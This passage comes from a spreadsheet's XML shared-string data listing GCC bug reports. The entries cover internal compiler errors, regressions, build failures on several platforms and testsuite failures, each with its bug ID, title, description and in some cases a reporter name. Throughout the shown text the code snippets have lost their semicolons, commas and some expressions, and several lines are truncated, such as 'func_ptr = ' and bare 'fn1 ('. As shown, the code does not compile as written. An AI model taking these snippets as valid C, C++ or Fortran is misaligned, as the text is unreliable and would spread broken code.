which is because the DR for ib[i] does not have pointer info:
      /* Copy the points-to information if it exists. */
      if (DR_PTR_INFO (dr))
        duplicate_ssa_name_ptr_info (vect_ptr_init DR_PTR_INFO (dr))
      vptr = vect_ptr_init
and so we end up using the SMT and its aliases in the operand scanner.
But the vectorizer does not bother to rename new symbols either here.
There are several possible solutions to this:
 - recompute aliasing after vectorization
 - compute new pointer information in this case (points-to a single symbol)
 - rename the SMT
Simplified testcase that ICEs for me with a ppc64 cross:
#define N 128
/* unaligned load.  */
int ia[N]
int ib[N+1]
void main1 (void)
{
  int i
  for (i = 1 i &lt;= N i++)
    {
      ia[i-1] = ib[i]
    }
}
./cc1 -quiet -O -maltivec -ftree-vectorize vect-27.c
vect-27.c: In function â€˜main1â€™:
vect-27.c:9: internal compiler error: tree check: expected ssa_name have symbol_memory_tag in is_old_name at tree-into-ssa.c:566
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.</t>
  </si>
  <si>
    <t>GCC-36701</t>
  </si>
  <si>
    <t>[4.4 Regression] unaligned access in gcc.c-torture/execute/complex-7.c</t>
  </si>
  <si>
    <t>Revision 137328 generates unaligned access in
gcc.c-torture/execute/complex-7.c
and revision 137304 is OK. Steve will your patch
http://gcc.gnu.org/ml/gcc-patches/2008-06/msg00884.html
cause this? Thanks.</t>
  </si>
  <si>
    <t>GCC-857</t>
  </si>
  <si>
    <t>ICE in output_operand_lossage</t>
  </si>
  <si>
    <t>$ /usr/local/beta/bin/g++ CLP_Types.ii
/home/roberto/china/src/CLP_Types.inlines.hh: In function `bool 
   operator==(const CLP_Integer&amp; int)':
/home/roberto/china/src/CLP_Types.inlines.hh:112: output_operand: invalid 
   expression as operand
/home/roberto/china/src/CLP_Types.inlines.hh:112: Internal compiler error in 
   output_operand_lossage at final.c:3393
confused by earlier errors bailing out
Release:
gcc version 2.97 20001120 (experimental)
Environment:
$ uname -a
Linux a.b.c 2.2.17 #17 Mon Sep 11 21:27:44 CEST 2000 i586 unknown
$ /usr/local/beta/bin/g++ -v          
Reading specs from /usr/local/beta/bin/../lib/gcc-lib/i386-pc-linux-gnu/2.97/specs
Configured with: ../configure --prefix=/tmp/gcc-20001120-root/usr/local --enable-shared --enable-threads --disable-checking i386-pc-linux-gnu
gcc version 2.97 20001120 (experimental)
gmp (GNU MP Library) version 3.01</t>
  </si>
  <si>
    <t>bagnara</t>
  </si>
  <si>
    <t>GCC-41755</t>
  </si>
  <si>
    <t>[4.3/4.4/4.5 Regression] Segfault on invalid code</t>
  </si>
  <si>
    <t>From https://bugzilla.novell.com/show_bug.cgi?id=546031
&gt; cat without_comma.f
c         without comma
      common /uno/ aa
      equivalence (aaaaaaa)   (bbcc)
      end
&gt;gfortran without_comma.f              
f951: internal compiler error: ViolaciÃ³n de segmento           
Please submit a full bug report                               
with preprocessed source if appropriate.</t>
  </si>
  <si>
    <t>GCC-65083</t>
  </si>
  <si>
    <t>Can not indirectly call some C11 atomic library functions</t>
  </si>
  <si>
    <t>C11 defines these as actual functions not generic functions or macros:
  atomic_thread_fence
  atomic_signal_fence
  atomic_flag_test_and_set
  atomic_flag_test_and_set_explicit
  atomic_flag_clear
  atomic_flag_clear_explicit
User should be able to take their address and call them indirectly. However GCC does not provide definitions of these functions in libatomic.so so GCC does not allow the user to take the address of these functions.
Here is an example:
-bash-4.1$ gcc -v
Using built-in specs.
COLLECT_GCC=/net/dv104/export/tools/gcc/4.9.2/sparc-S2/bin/gcc.bin
COLLECT_LTO_WRAPPER=/net/dv104/export/tools/gcc/4.9.2/sparc-S2/libexec/gcc/sparc-sun-solaris2.10/4.9.2/lto-wrapper
Target: sparc-sun-solaris2.10
Configured with: ../gcc-4.9.2/configure --prefix=/net/dv104/export/tools/gcc/4.9.2/sparc-S2 --enable-languages=cc++fortran --with-gmp=/net/dv104/export/tools/gcc/4.9.2/sparc-S2 --with-mpfr=/net/dv104/export/tools/gcc/4.9.2/sparc-S2 --with-mpc=/net/dv104/export/tools/gcc/4.9.2/sparc-S2
Thread model: posix
gcc version 4.9.2 (GCC) 
-bash-4.1$ cat t.c
#include 
void (*func_ptr) (memory_order order)
int main()
{
 func_ptr = 
 (*func_ptr)(memory_order_seq_cst)
 return 0
}
-bash-4.1$ gcc t.c -latomic
t.c: In function 'main':
t.c:5:15: error: 'atomic_thread_fence' undeclared (first use in this function)
  func_ptr = 
              ^
t.c:5:15: note: each undeclared identifier is reported only once for each function it appears in</t>
  </si>
  <si>
    <t>bin.x.fan</t>
  </si>
  <si>
    <t>GCC-69835</t>
  </si>
  <si>
    <t>[6 Regression] -Wnonnull diagnoses parameter comparisons with NULL even when those could have changed</t>
  </si>
  <si>
    <t>-Wnonnull warns even about:
static void f(const char *s)
{
  do {
    printf(%s\ns)
    s = NULL
  } while (s != NULL)
}
which is wrong after the parameter has been changed or could have been changed it is completely valid to compare it against NULL.</t>
  </si>
  <si>
    <t>GCC-28999</t>
  </si>
  <si>
    <t>[4.0 regression] ICE on invalid use of typename</t>
  </si>
  <si>
    <t>The following invalid code snippet triggers an ICE since GCC 3.4.0:
======================================
namespace N
{
  template void foo()
}
template struct A
{
  friend void typename N::foo()
}
======================================
bug.cc:8: internal compiler error: in make_typename_type at cp/decl.c:2818
Please submit a full bug report [etc.]</t>
  </si>
  <si>
    <t>GCC-62016</t>
  </si>
  <si>
    <t>[4.9 Regression] very slow compilation at -O3 on x86_64-linux-gnu</t>
  </si>
  <si>
    <t>The following test case takes the current gcc trunk much longer to compile at -O3 on x86_64-linux (in both 32-bit and 64-bit modes). 
It also affects gcc 4.8.x and 4.9.x and is a regression from 4.7.x. 
This is likely due to the inliner as the code compiles fine with -fno-inline.  
$ gcc-trunk -v
Using built-in specs.
COLLECT_GCC=gcc-trunk
COLLECT_LTO_WRAPPER=/usr/local/gcc-trunk/libexec/gcc/x86_64-unknown-linux-gnu/4.10.0/lto-wrapper
Target: x86_64-unknown-linux-gnu
Configured with: ../gcc-trunk/configure --prefix=/usr/local/gcc-trunk --enable-languages=cc++ --disable-werror --enable-multilib
Thread model: posix
gcc version 4.10.0 20140804 (experimental) [trunk revision 213529] (GCC) 
$ 
$ time gcc-trunk -O2 small.c    
0.02user 0.01system 0:00.28elapsed 15%CPU (0avgtext+0avgdata 50912maxresident)k
0inputs+32outputs (1major+6643minor)pagefaults 0swaps
$ time gcc-4.7 -O3 small.c
0.11user 0.02system 0:00.71elapsed 19%CPU (0avgtext+0avgdata 65344maxresident)k
0inputs+32outputs (1major+7683minor)pagefaults 0swaps
$ 
$ time gcc-trunk -O3 -fno-inline small.c
0.04user 0.01system 0:00.47elapsed 12%CPU (0avgtext+0avgdata 51776maxresident)k
0inputs+32outputs (1major+6709minor)pagefaults 0swaps
$ 
$ time gcc-trunk -O3 small.c
8.43user 0.28system 0:34.83elapsed 25%CPU (0avgtext+0avgdata 1622880maxresident)k
0inputs+32outputs (1major+106347minor)pagefaults 0swaps
$ 
----------------------------------
#include 
int a b c d e f g h i j
void
fn1 (int *p1 int *p2)
{
  for ( a a++)
    {
      assert (p1 == 0)
      fn1 (0 p2)
      fn1 (
      fn1 (
    }
}
void
fn2 ()
{
  fn1 (
  fn1 (
  fn1 (
  fn1 (
  fn1 (
  fn1 (
}
int 
main ()
{
  fn2 () 
  return 0 
}</t>
  </si>
  <si>
    <t>GCC-47716</t>
  </si>
  <si>
    <t>libgfortran quadmath_weak.h not found on NetBSD 5.1</t>
  </si>
  <si>
    <t>As of 
Sat Feb 12 14:15:11 UTC 2011 (revision 170072)
trunk libgfortran fails to build on gcc70 the NetBSD 5.1 compile farm machine:
gmake[3]: Entering directory `/home/guerby/build/x86_64-unknown-netbsd5.1/libgfortran'
/bin/ksh ./libtool --tag=CC   --mode=compile /home/guerby/build/./gcc/xgcc -B/home/guerby/build/./gcc/ -B/home/guerby/install-46/x86_64-unknown-netbsd5.1/bin/ -B/home/guerby/install-46/x86_64-unknown-netbsd5.1/lib/ -isystem /home/gue\
rby/install-46/x86_64-unknown-netbsd5.1/include -isystem /home/guerby/install-46/x86_64-unknown-netbsd5.1/sys-include    -DHAVE_CONFIG_H -I. -I../../../trunk/libgfortran  -iquote../../../trunk/libgfortran/io -I../../../trunk/libgfort\
ran/../gcc -I../../../trunk/libgfortran/../gcc/config  -I../.././gcc -D_GNU_SOURCE  -std=gnu99 -Wall -Wstrict-prototypes -Wmissing-prototypes -Wold-style-definition -Wextra -Wwrite-strings -fcx-fortran-rules -ffunction-sections -fdat\
a-sections  -g -O2 -MT fmain.lo -MD -MP -MF .deps/fmain.Tpo -c -o fmain.lo ../../../trunk/libgfortran/fmain.c
libtool: compile:  /home/guerby/build/./gcc/xgcc -B/home/guerby/build/./gcc/ -B/home/guerby/install-46/x86_64-unknown-netbsd5.1/bin/ -B/home/guerby/install-46/x86_64-unknown-netbsd5.1/lib/ -isystem /home/guerby/install-46/x86_64-unkn\
own-netbsd5.1/include -isystem /home/guerby/install-46/x86_64-unknown-netbsd5.1/sys-include -DHAVE_CONFIG_H -I. -I../../../trunk/libgfortran -iquote../../../trunk/libgfortran/io -I../../../trunk/libgfortran/../gcc -I../../../trunk/li\
bgfortran/../gcc/config -I../.././gcc -D_GNU_SOURCE -std=gnu99 -Wall -Wstrict-prototypes -Wmissing-prototypes -Wold-style-definition -Wextra -Wwrite-strings -fcx-fortran-rules -ffunction-sections -fdata-sections -g -O2 -MT fmain.lo -\
MD -MP -MF .deps/fmain.Tpo -c ../../../trunk/libgfortran/fmain.c  -fPIC -DPIC -o .libs/fmain.o
In file included from ../../../trunk/libgfortran/fmain.c:4:0:
../../../trunk/libgfortran/libgfortran.h:53:29: fatal error: quadmath_weak.h: No such file or directory
gmake[3]: *** [fmain.lo] Error 1
gmake[3]: Leaving directory `/home/guerby/build/x86_64-unknown-netbsd5.1/libgfortran'
gmake[2]: *** [all] Error 2
gmake[2]: Leaving directory `/home/guerby/build/x86_64-unknown-netbsd5.1/libgfortran'
gmake[1]: *** [all-target-libgfortran] Error 2
c and c++ fo build succesfully:
http://gcc.gnu.org/ml/gcc-testresults/2011-02/msg01405.html</t>
  </si>
  <si>
    <t>GCC-49965</t>
  </si>
  <si>
    <t>libgomp.c++/reduction-4.C and libgomp.c++/task-8.C FAIL on Solaris 11/SPARC</t>
  </si>
  <si>
    <t>Two new libgomp testcases FAIL on Solaris 11/SPARC:
FAIL: libgomp.c++/reduction-4.C  -O0  execution test
  both 32 and 64-bit
  abort () here:
#3  0x000183b8 in foo () at /vol/gcc/src/hg/trunk/solaris/libgomp/testsuite/libgomp.c++/reduction-4.C:26
  j = 8 p = inf
  This doesn't happen on Solaris 10/x86.
FAIL: libgomp.c++/task-8.C  -O0  (test for excess errors)
Excess errors:
ld: warning: symbol 'err' has differing types:
	(file /var/tmp//ccD0aiQD.o type=OBJT file /lib/libc.so type=FUNC)
	/var/tmp//ccD0aiQD.o definition taken
ld: warning: symbol 'err' has differing types:
	(file /var/tmp//ccD0aiQD.o type=OBJT file /lib/libc.so type=FUNC)
  err() was only introduced in Solaris 11.  Replacing err by error fixes this.</t>
  </si>
  <si>
    <t>GCC-319</t>
  </si>
  <si>
    <t>duplicate typedef removed DECL_ORIGINAL_TYPE and results in ICE</t>
  </si>
  <si>
    <t>See http://gcc.gnu.org/ml/gcc-patches/2000-06/msg00340.html
Testcase commited as
g++.old-deja/g++.other/type.C
Did not happen with older compilers
Release:
gcc-2.96
Environment:
i386-redhat-linux
How-To-Repeat:
g++ g++.old-deja/g++.other/type.C</t>
  </si>
  <si>
    <t>GCC-3575</t>
  </si>
  <si>
    <t>Unnecessary template expansion when explicit function present.</t>
  </si>
  <si>
    <t>The call to INPUT(in (const char *) name) in main
triggers the template INPUT( blah T&amp; ) instead of
INPUT( blah const char *).
Please refrain from don't use external-templates response.
There are good reasons for using this template strategy
in this app.
The repo model is no use in the real app which is large 
and used the strategy of expanding templates a the mainline compile
time. The SGI strategy also works as does the ptr
template repository method provided it is possible to specify
the repository directory.
The source is spread across many directories and the
libraries also reside in different trees. All have templates.
The repo model does not seem expand templates that arise from 
lower level library code or at least making it do so seems
onerous and violates modularity.
Ie. template here uses template there which uses another
second tier template elsewhere. Explicit expansion using phony
forward reference does not seem to generate code for the second 
tier expansion elsewhere. The solution of forward ref'ing all
templates here that might be generated there and elsewhere
requires knowledge of the internal structure of the lower level 
library which violates modularity. It would also result 
in mul'defs with absolute certainty unless everybody knows 
what everybody else is expanding. So that is not acceptable.
An alternative is to force all libraries to close by
compiling with a fake mainline and forcing the rpo's to
do their thing layer by layer closing each library in 
turn.
That works up to a point BUT  
If there are circular dependencies (not in header files 
but in implementation .cc files) then the repo strategy results 
in an infinite loop generated by pairs of files triggering recompiles
of each other. This circular dependency is not bad
design. All it requires is for a template container to 
ref it's template contents and for the contents to ref. 
their container (plus some other conditions)! 
Have not put my finger on the EXACT circumstance 
but frankly I have to give up.
BTW the same problem exists in the current version.
Release:
unknown
Environment:
RedHat Linux 7.1
g++ version 2.96-85
How-To-Repeat:
compile attached file with
g++ -fexternal-templates</t>
  </si>
  <si>
    <t>peterho</t>
  </si>
  <si>
    <t>GCC-58933</t>
  </si>
  <si>
    <t>IRA ICE in update_costs_from_allocno</t>
  </si>
  <si>
    <t>/nasfarm/edelsohn/src/src/libgcc/libgcov.c: In function 'gcov_exit':
/nasfarm/edelsohn/src/src/libgcc/libgcov.c:827:1: internal compiler error: in up
date_costs_from_allocno at ira-color.c:1334</t>
  </si>
  <si>
    <t>GCC-41446</t>
  </si>
  <si>
    <t>in-tree GMP/MPFR requires c++ as stage 1 lang 2 object compares fail.</t>
  </si>
  <si>
    <t>for example with --enable-stage1-languages=cc++ (required for in-tree GMP/MPFR)
Comparing stages 2 and 3
warning: gcc/cc1-checksum.o differs
warning: gcc/cc1obj-checksum.o differs
warning: gcc/cc1objplus-checksum.o differs
warning: gcc/cc1plus-checksum.o differs
Bootstrap comparison failure!
i686-apple-darwin9/libstdc++-v3/src/.libs/future.o differs
i686-apple-darwin9/libstdc++-v3/src/.libs/system_error.o differs
i686-apple-darwin9/libstdc++-v3/src/future.o differs
i686-apple-darwin9/libstdc++-v3/src/system_error.o differs
i686-apple-darwin9/x86_64/libstdc++-v3/src/.libs/future.o differs
i686-apple-darwin9/x86_64/libstdc++-v3/src/.libs/system_error.o differs
i686-apple-darwin9/x86_64/libstdc++-v3/src/future.o differs
i686-apple-darwin9/x86_64/libstdc++-v3/src/system_error.o differs
make[2]: *** [compare] Error 1
stripped future.o from stage 2
000007e0  63 5f 5f 5f 76 33 5f 73  72 63 5f 66 75 74 75 72  |c___v3_src_futur|
000007f0  65 2e 63 63 5f 30 30 30  30 30 30 30 30 5f 34 37  |e.cc_00000000_47|
00000800  44 39 32 31 34 32 32 31  66 75 74 75 72 65 5f 65  |D9214221future_e|
00000810  72 72 6f 72 5f 63 61 74  65 67 6f 72 79 45 00 00  |rror_categoryE..|
stripped future.o from stage 3
000007e0  63 5f 5f 5f 76 33 5f 73  72 63 5f 66 75 74 75 72  |c___v3_src_futur|
000007f0  65 2e 63 63 5f 30 30 30  30 30 30 30 30 5f 45 35  |e.cc_00000000_E5|
00000800  45 38 41 43 44 37 32 31  66 75 74 75 72 65 5f 65  |E8ACD721future_e|
00000810  72 72 6f 72 5f 63 61 74  65 67 6f 72 79 45 00 00  |rror_categoryE..|
===
stripped system_error.o from stage 2
000007a0  30 30 30 5f 37 37 34 44  41 30 30 45 32 32 67 65  |000_774DA00E22ge|
000007b0  6e 65 72 69 63 5f 65 72  72 6f 72 5f 63 61 74 65  |neric_error_cate|
000007c0  67 6f 72 79 45 00 00 00  00 00 00 00 00 00 00 00  |goryE...........|
000007d0  4e 38 39 5f 47 4c 4f 42  41 4c 5f 5f 4e 5f 2e 2e  |N89_GLOBAL__N_..|
000007e0  5f 2e 2e 5f 2e 2e 5f 2e  2e 5f 67 63 63 5f 34 5f  |_.._.._.._gcc_4_|
000007f0  35 5f 72 65 67 74 65 73  74 5f 6c 69 62 73 74 64  |5_regtest_libstd|
00000800  63 5f 5f 5f 76 33 5f 73  72 63 5f 73 79 73 74 65  |c___v3_src_syste|
00000810  6d 5f 65 72 72 6f 72 2e  63 63 5f 30 30 30 30 30  |m_error.cc_00000|
00000820  30 30 30 5f 37 37 34 44  41 30 30 45 32 31 73 79  |000_774DA00E21sy|
stripped system_error.o from stage 3
000007a0  30 30 30 5f 35 39 44 36  31 37 37 43 32 32 67 65  |000_59D6177C22ge|
000007b0  6e 65 72 69 63 5f 65 72  72 6f 72 5f 63 61 74 65  |neric_error_cate|
000007c0  67 6f 72 79 45 00 00 00  00 00 00 00 00 00 00 00  |goryE...........|
000007d0  4e 38 39 5f 47 4c 4f 42  41 4c 5f 5f 4e 5f 2e 2e  |N89_GLOBAL__N_..|
000007e0  5f 2e 2e 5f 2e 2e 5f 2e  2e 5f 67 63 63 5f 34 5f  |_.._.._.._gcc_4_|
000007f0  35 5f 72 65 67 74 65 73  74 5f 6c 69 62 73 74 64  |5_regtest_libstd|
00000800  63 5f 5f 5f 76 33 5f 73  72 63 5f 73 79 73 74 65  |c___v3_src_syste|
00000810  6d 5f 65 72 72 6f 72 2e  63 63 5f 30 30 30 30 30  |m_error.cc_00000|
00000820  30 30 30 5f 35 39 44 36  31 37 37 43 32 31 73 79  |000_59D6177C21sy|
Jakub Jalinek has commented in 41405:
The difference you are seeing is likely related to different random seed you'd need to pass the same
-frandom-seed=XXXX in both stage2 and stage3 builds...
However this is new since approx. 151920.</t>
  </si>
  <si>
    <t>GCC-37089</t>
  </si>
  <si>
    <t>[C++0x] rvalue/lvalue reference collapsing not performed in error ouput thus printing &amp;&amp;&amp;</t>
  </si>
  <si>
    <t>template 
void f(T
template 
void f(T&amp;&amp; a){ 
  foo(std::forward(a) true)
} 
void f(int&amp;&amp; a bool)
{ } 
int main()
{
  int a
  f(a)
}
undefined reference to 'void f(int&amp;&amp;&amp; bool)'.
Note the &amp;&amp;&amp; which I believe is int&amp;&amp; + int&amp; which should be int&amp;.
Chris</t>
  </si>
  <si>
    <t>chris.fairles</t>
  </si>
  <si>
    <t>GCC-48842</t>
  </si>
  <si>
    <t>[4.7 regression] ICE in evaluate_conditions_for_edge at ipa-inline-analysis.c:537 on Tru64 Unix</t>
  </si>
  <si>
    <t>Bootstrap on Tru64 UNIX V5.1B is currently broken when compiling libstdc++:
/var/gcc/regression/trunk/5.1b-gcc/build/alpha-dec-osf5.1b/libstdc++-v3/include/bits/unordered_set.h:398:1: internal compiler error: vector VEC(treebase) index domain error in evaluate_conditions_for_edge at ipa-inline-analysis.c:537
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
make[4]: *** [alpha-dec-osf5.1b/bits/stdc++.h.gch/O2ggnu++0x.gch] Error 1
This is obviously due to this patch:
2011-04-22  Jan Hubicka  
        * gengtype.c (open_base_files): Add ipa-inline.h include.
[...]
        (true_predicate single_cond_predicate false_predicate
        not_inlined_predicate add_condition add_clause and_predicates
        or_predicates predicates_equal_p evaulate_predicate dump_condition
        dump_clause dump_predicate account_size_time
        evaulate_conditions_for_edge): New functions.
Please fix.
  Rainer</t>
  </si>
  <si>
    <t>GCC-11955</t>
  </si>
  <si>
    <t>Internal compiler error in reload at reload1.c:1112</t>
  </si>
  <si>
    <t>Compiler crushes when trying to compile following program:
/*BEGIN*/
int main(int argc char**argv)
{
  union {
    long long int a
    double b
  } c
  c.b=0
  for() {
    c.b++
    if(!c.a) break
  }
  return 0
}
/* END */
Compile options are -O3 -march=pentium4</t>
  </si>
  <si>
    <t>antonl</t>
  </si>
  <si>
    <t>GCC-81158</t>
  </si>
  <si>
    <t>[8 regression] Many test case failures starting with r249424</t>
  </si>
  <si>
    <t>The following tests are the ones that fail on powerpc64.  Most fail on just LE but a few also fail on BE.
FAIL: gcc.c-torture/execute/pr51581-1.c   -O3 -fomit-frame-pointer -funroll-loops -fpeel-loops -ftracer -finline-functions  execution test
FAIL: gcc.c-torture/execute/pr51581-1.c   -O3 -g  execution test
FAIL: gcc.c-torture/execute/pr51581-2.c   -O3 -fomit-frame-pointer -funroll-loops -fpeel-loops -ftracer -finline-functions  execution test
FAIL: gcc.c-torture/execute/pr51581-2.c   -O3 -g  execution test
FAIL: gcc.c-torture/execute/pr53645.c   -O1  execution test
FAIL: gcc.c-torture/execute/pr53645.c   -O2  execution test
FAIL: gcc.c-torture/execute/pr53645.c   -O2 -flto -fno-use-linker-plugin -flto-partition=none  execution test
FAIL: gcc.c-torture/execute/pr53645.c   -O2 -flto -fuse-linker-plugin -fno-fat-lto-objects  execution test
FAIL: gcc.c-torture/execute/pr53645.c   -O3 -fomit-frame-pointer -funroll-loops -fpeel-loops -ftracer -finline-functions  execution test
FAIL: gcc.c-torture/execute/pr53645.c   -O3 -g  execution test
FAIL: gcc.c-torture/execute/pr53645.c   -Os  execution test
FAIL: gcc.dg/vect/pr51581-1.c -flto -ffat-lto-objects execution test
FAIL: gcc.dg/vect/pr51581-1.c execution test
FAIL: gcc.dg/vect/pr51581-2.c -flto -ffat-lto-objects execution test
FAIL: gcc.dg/vect/pr51581-2.c execution test
FAIL: gcc.dg/vect/pr51581-3.c -flto -ffat-lto-objects execution test
FAIL: gcc.dg/vect/pr51581-3.c execution test
FAIL: gcc.target/powerpc/builtins-3.c scan-assembler-times vmulesh 1
FAIL: gcc.target/powerpc/builtins-3.c scan-assembler-times vmuleuh 1
FAIL: gcc.target/powerpc/builtins-3.c scan-assembler-times vmulosh 1
FAIL: gcc.target/powerpc/builtins-3.c scan-assembler-times vmulouh 1
	Note: builttin-3 also fails on BE
FAIL: libgomp.fortran/appendix-a/a.16.1.f90   -O3 -fomit-frame-pointer -funroll-loops -fpeel-loops -ftracer -finline-functions  execution test
From looking at the failures it appears that array values are getting messed up.
Looking at pr51581-1:
(gdb) run
Starting program: /home/seurer/gcc/build/gcc-test/pr51581-1.exe 
Program received signal SIGABRT Aborted.
0x00003fffb7d00a88 in __GI_raise (sig=) at ../nptl/sysdeps/unix/sysv/linux/raise.c:56
56	../nptl/sysdeps/unix/sysv/linux/raise.c: No such file or directory.
(gdb) where
#0  0x00003fffb7d00a88 in __GI_raise (sig=) at ../nptl/sysdeps/unix/sysv/linux/raise.c:56
#1  0x00003fffb7d0686c in __GI_abort () at abort.c:89
#2  0x0000000010000874 in main () at /home/seurer/gcc/gcc-test/gcc/testsuite/gcc.c-torture/execute/pr51581-1.c:130
int
main ()
{
. . .
  for (i = 0 i &lt; N i++)
    if (c[i] != a[i] / 3 || d[i] != b[i] / 3)
      abort ()  // line 130
. . .
Looking at pr53645:
(gdb) run
Starting program: /home/seurer/gcc/build/gcc-test/pr53645.exe 
Program received signal SIGABRT Aborted.
0x00003fffb7d00a88 in __GI_raise (sig=) at ../nptl/sysdeps/unix/sysv/linux/raise.c:56
56	../nptl/sysdeps/unix/sysv/linux/raise.c: No such file or directory.
(gdb) where
#0  0x00003fffb7d00a88 in __GI_raise (sig=) at ../nptl/sysdeps/unix/sysv/linux/raise.c:56
#1  0x00003fffb7d0686c in __GI_abort () at abort.c:89
#2  0x0000000010001fc8 in main () at /home/seurer/gcc/gcc-test/gcc/testsuite/gcc.c-torture/execute/pr53645.c:74
int
main ()
{
  UV ur ur2
  SV sr sr2
  int i
#undef TEST
#define TEST(a b c d)				\
    uq##a##b##c##d (			\
    if (ur[0] != u[i][0] / a || ur[3] != u[i][3] / d)	\
     abort ()						\
    asm volatile ( : : r (		\
    if (ur[2] != u[i][2] / c || ur[1] != u[i][1] / b)	\
     abort ()						\
    asm volatile ( : : r (		\
    ur##a##b##c##d (			\
    if (ur[0] != u[i][0] % a || ur[3] != u[i][3] % d)	\
     abort ()						\
    asm volatile ( : : r (		\
    if (ur[2] != u[i][2] % c || ur[1] != u[i][1] % b)	\
     abort ()						\
    asm volatile ( : : r (
  for (i = 0 i &lt; sizeof (u) / sizeof (u[0]) i++)
    {
      TESTS  // Line 74
    }
The last one fails with a segmentation fault:
Program received signal SIGSEGV: Segmentation fault - invalid memory reference.
Backtrace for this error:
FAIL: libgomp.fortran/appendix-a/a.16.1.f90   -O3 -g  execution test</t>
  </si>
  <si>
    <t>GCC-10110</t>
  </si>
  <si>
    <t>[3.3/3.4 regression] [mipsel-linux]ada bootstrap error</t>
  </si>
  <si>
    <t>Ada on mipsel-linux doesn't build. Last checked with CVS 20030301.
Complete build log at
http://buildd.debian.org/fetch.php?&amp;pkg=gcc-snapshot&amp;ver=20030301-1&amp;arch=mipsel&amp;stamp=1046572232&amp;file=log&amp;as=raw
../../gnatlink -v gnatpsta -o ../../gnatpsta --GCC=../../xgcc -B../../ -I../rts -I. -I/build/buildd/gcc-snapshot-20030301/src/gcc/ada\
                      ../targtyps.o deftarg.o ../../prefix.o ../../version.o ../rts/libgnat.a  ../../../libiberty/libiberty.a  
GNATLINK 3.3 20030301 (prerelease) Copyright 1996-2002 Free Software Foundation Inc.
xgcc -c -gnatA -gnatWb -gnatiw -B../../ -I../rts -I. -I/build/buildd/gcc-snapshot-20030301/src/gcc/ada -gnatws b~gnatpsta.adb
../../xgcc b~gnatpsta.o ../targtyps.o deftarg.o ../../prefix.o ../../version.o ../rts/ada.o ../rts/gnat.o ../rts/g-hesora.o ../rts/g-htable.o ../rts/interfac.o ../rts/system.o ../rts/s-parame.o ../rts/i-cstrea.o ../rts/s-powtab.o ../rts/s-exctab.o ../rts/a-ioexce.o ../rts/s-assert.o ../rts/s-except.o ../rts/s-stoele.o ../rts/s-mastop.o ../rts/s-imgint.o ../rts/a-tags.o ../rts/a-stream.o ../rts/s-soflin.o ../rts/s-stache.o ../rts/s-secsta.o ../rts/s-finroo.o ../rts/s-memory.o ../rts/s-stalib.o ../rts/s-strops.o ../rts/s-sopco3.o ../rts/s-sopco4.o ../rts/s-sopco5.o ../rts/s-traceb.o ../rts/a-except.o ../rts/s-unstyp.o ../rts/s-fatllf.o ../rts/s-imgllu.o ../rts/s-imguns.o ../rts/s-imgrea.o ../rts/s-stratt.o ../rts/s-finimp.o ../rts/a-finali.o ../rts/a-filico.o ../rts/s-ficobl.o ../rts/s-fileio.o ../rts/a-textio.o ./ttypef.o ./types.o ./get_targ.o ./ttypes.o ./gnatpsta.o -o ../../gnatpsta ../rts/libgnat.a ../../../libiberty/libiberty.a -L./ -L../rts/ -L/build/buildd/gcc-snapshot-
 20030301/src/gcc/ada/ -L/usr/lib/gcc-snapshot/lib/gcc-lib/mipsel-linux/3.3/adalib/ ../rts/libgnat.a -B../../ -I../rts -I. -I/build/buildd/gcc-snapshot-20030301/src/gcc/ada
../targtyps.o(.text+0x134): In function `get_target_long_double_size':
: undefined reference to `mips_abi'
../targtyps.o(.text+0x1a0): In function `get_target_maximum_alignment':
: undefined reference to `mips_abi'
collect2: ld returned 1 exit status
gnatlink: cannot call ../../xgcc
make[4]: *** [../../gnatpsta] Error 4
Release:
3.3 branch CVS 20030301
Environment:
mipsel-linux Debian unstable</t>
  </si>
  <si>
    <t>GCC-59637</t>
  </si>
  <si>
    <t>[c++11] ICE with decltype and destructor call in template</t>
  </si>
  <si>
    <t>The following invalid code snippet (compiled with -std=c++11) triggers an
ICE since GCC 4.7.0:
===========================================
template void foo(T* p)
{
  p-&gt;decltype(T{})::~X()
}
===========================================
bug.cc: In function 'void foo(T*)':
bug.cc:3:21: internal compiler error: Segmentation fault
   p-&gt;decltype(T{})::~X()
                     ^
0xb75baf crash_signal
        ../../gcc/gcc/toplev.c:336
0x6785d7 contains_struct_check
        ../../gcc/gcc/tree.h:2820
0x6785d7 cp_parser_unqualified_id
        ../../gcc/gcc/cp/parser.c:4926
0x68fd73 cp_parser_id_expression
        ../../gcc/gcc/cp/parser.c:4726
0x6993e8 cp_parser_postfix_dot_deref_expression
        ../../gcc/gcc/cp/parser.c:6529
0x67e729 cp_parser_postfix_expression
        ../../gcc/gcc/cp/parser.c:6186
0x681698 cp_parser_unary_expression
        ../../gcc/gcc/cp/parser.c:7170
0x68232f cp_parser_binary_expression
        ../../gcc/gcc/cp/parser.c:7874
0x682821 cp_parser_assignment_expression
        ../../gcc/gcc/cp/parser.c:8112
0x6847b4 cp_parser_expression
        ../../gcc/gcc/cp/parser.c:8274
0x684fec cp_parser_expression
        ../../gcc/gcc/cp/parser.c:8313
0x684fec cp_parser_expression_statement
        ../../gcc/gcc/cp/parser.c:9617
0x67a818 cp_parser_statement
        ../../gcc/gcc/cp/parser.c:9468
0x67b5c9 cp_parser_statement_seq_opt
        ../../gcc/gcc/cp/parser.c:9740
0x67b73e cp_parser_compound_statement
        ../../gcc/gcc/cp/parser.c:9694
0x68f15b cp_parser_function_body
        ../../gcc/gcc/cp/parser.c:18610
0x68f15b cp_parser_ctor_initializer_opt_and_function_body
        ../../gcc/gcc/cp/parser.c:18646
0x6934fe cp_parser_function_definition_after_declarator
        ../../gcc/gcc/cp/parser.c:22678
0x694394 cp_parser_function_definition_from_specifiers_and_declarator
        ../../gcc/gcc/cp/parser.c:22590
0x694394 cp_parser_init_declarator
        ../../gcc/gcc/cp/parser.c:16588
Please submit a full bug report [etc.]
The code was wrongly rejected from GCC 4.3.0 (where decltype was introduced)
until GCC 4.6.4.</t>
  </si>
  <si>
    <t>GCC-22211</t>
  </si>
  <si>
    <t>[4.0 only] Thread.interrupt sometimes causes abort if thread is already dead</t>
  </si>
  <si>
    <t>Thread.interrupt does not check if the thread is alive - it just signals the
thread regardless. This sometimes causes a segfault followed by an abort
because the native thread library gets passed stale data.
Unable to create a reproducable test case - but I would hope it's self-evident
that the existing code in _Jv_ThreadInterrupt is bogus.
To fix this correctly two things need to happen. (1) When interrupting don't
do anything if the thread is not alive. (2) Properly synchronize access to the
alive_flag to avoid races.</t>
  </si>
  <si>
    <t>GCC-11740</t>
  </si>
  <si>
